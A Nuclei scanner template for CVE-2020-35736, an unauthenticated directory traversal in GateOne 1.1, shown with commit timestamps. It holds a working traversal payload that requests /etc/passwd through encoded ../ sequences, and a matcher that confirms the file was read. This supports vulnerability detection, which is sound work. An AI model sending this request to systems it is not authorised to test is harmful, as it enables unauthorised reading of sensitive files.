nuclei-templates/cves/2020/CVE-2020-35736.yaml

26 lines
692 B
YAML
Raw Normal View History

2021-05-27 12:56:22 +00:00
id: CVE-2020-35736
info:
2021-05-28 03:56:30 +00:00
name: GateOne Arbitrary File Download
2021-05-27 12:56:22 +00:00
author: pikpikcu
severity: high
2021-05-28 03:56:30 +00:00
description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused.
2021-05-27 13:03:59 +00:00
reference: |
- https://github.com/liftoff/GateOne/issues/747
2021-05-28 03:56:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
tags: cve,cve2020,gateone,lfi
2021-05-27 12:56:22 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
matchers-condition: and
matchers:
2021-05-27 15:02:32 +00:00
- type: regex
regex:
2021-05-27 12:56:22 +00:00
- "root:[x*]:0:0:"
- type: status
status:
2021-05-28 03:56:30 +00:00
- 200